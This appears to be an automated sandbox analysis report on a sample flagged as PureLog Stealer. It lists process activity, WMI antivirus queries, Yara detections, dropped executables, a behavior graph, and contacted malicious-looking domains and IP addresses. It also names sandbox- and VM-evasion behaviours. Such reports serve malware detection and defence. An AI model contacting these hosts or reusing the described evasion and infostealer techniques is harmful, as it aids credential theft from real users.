Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Queries volume information: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected PureLog Stealer
Source: Yara match File source: 0.2.file.exe.459c2e8.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TypeId.exe.4a46068.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TypeId.exe.4a96088.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.440c2a8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.b070000.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TypeId.exe.427ffc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.4ae3330.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TypeId.exe.4a96088.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.txxbiwtbs.exe.3c19948.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.txxbiwtbs.exe.3c19948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.4ae3330.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.440c2a8.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.txxbiwtbs.exe.7520000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.445c2c8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.91a2688.15.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.526a0e8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4e9edb0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.91a2688.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.8f40000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.459c2e8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.b070000.26.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.4259570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.4259570.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.txxbiwtbs.exe.7520000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4e7ed90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.8f40000.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.6b60000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.4059550.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4e9edb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.526a0e8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TypeId.exe.427ffc0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.6b60000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.4659590.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TypeId.exe.4c760c8.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.445c2c8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TypeId.exe.4a46068.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TypeId.exe.4c760c8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4e7ed90.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TypeId.exe.494cee0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.4659590.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.478c788.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.4059550.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.3019858995.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2048354854.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2167920075.0000000007520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1808267831.0000000008F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1783529566.0000000006B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3204622217.0000000009049000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1869188121.0000000004131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3019858995.0000000004659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1830742150.000000000B070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1767868411.0000000004378000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3019858995.0000000004058000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1767868411.0000000005266000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1790879005.0000000007CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: TypeId.exe PID: 7764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 8028, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected PureLog Stealer
Source: Yara match File source: 0.2.file.exe.459c2e8.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TypeId.exe.4a46068.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TypeId.exe.4a96088.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.440c2a8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.b070000.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TypeId.exe.427ffc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.4ae3330.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TypeId.exe.4a96088.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.txxbiwtbs.exe.3c19948.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.txxbiwtbs.exe.3c19948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.4ae3330.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.440c2a8.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.txxbiwtbs.exe.7520000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.445c2c8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.91a2688.15.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.526a0e8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4e9edb0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.91a2688.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.8f40000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.459c2e8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.b070000.26.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.4259570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.4259570.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.txxbiwtbs.exe.7520000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4e7ed90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.8f40000.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.6b60000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.4059550.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4e9edb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.526a0e8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TypeId.exe.427ffc0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.6b60000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.4659590.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TypeId.exe.4c760c8.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.445c2c8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TypeId.exe.4a46068.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TypeId.exe.4c760c8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.4e7ed90.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.TypeId.exe.494cee0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.4659590.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.478c788.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.InstallUtil.exe.4059550.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.3019858995.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2048354854.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2167920075.0000000007520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1808267831.0000000008F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1783529566.0000000006B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3204622217.0000000009049000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1869188121.0000000004131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3019858995.0000000004659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1830742150.000000000B070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1767868411.0000000004378000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3019858995.0000000004058000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1767868411.0000000005266000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1790879005.0000000007CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: TypeId.exe PID: 7764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 8028, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1458397 Sample: file.exe Startdate: 17/06/2024 Architecture: WINDOWS Score: 100 35 f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm 2->35 37 1.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm 2->37 43 Snort IDS alert for network traffic 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 11 other signatures 2->49 7 TypeId.exe 14 5 2->7         started        10 file.exe 14 9 2->10         started        14 powershell.exe 23 2->14         started        16 2 other processes 2->16 signatures3 process4 dnsIp5 53 Multi AV Scanner detection for dropped file 7->53 55 Machine Learning detection for dropped file 7->55 57 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 7->57 63 2 other signatures 7->63 18 InstallUtil.exe 15 5 7->18         started        41 f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm 188.114.96.3, 443, 49731, 49732 CLOUDFLARENETUS European Union 10->41 29 C:\Users\user\AppData\Local\...\TypeId.exe, PE32 10->29 dropped 31 C:\Users\user\...\TypeId.exe:Zone.Identifier, ASCII 10->31 dropped 33 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 10->33 dropped 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->59 61 Loading BitLocker PowerShell Module 14->61 23 conhost.exe 14->23         started        25 conhost.exe 16->25         started        file6 signatures7 process8 dnsIp9 39 1.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm 77.221.140.76, 49735, 58001, 65276 INFOBOX-ASInfoboxruAutonomousSystemRU Russian Federation 18->39 27 C:\Users\user\AppData\Local\...\txxbiwtbs.exe, PE32 18->27 dropped 51 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->51 file10 signatures11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.114.96.3
 f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm European Union
13335 CLOUDFLARENETUS true
77.221.140.76
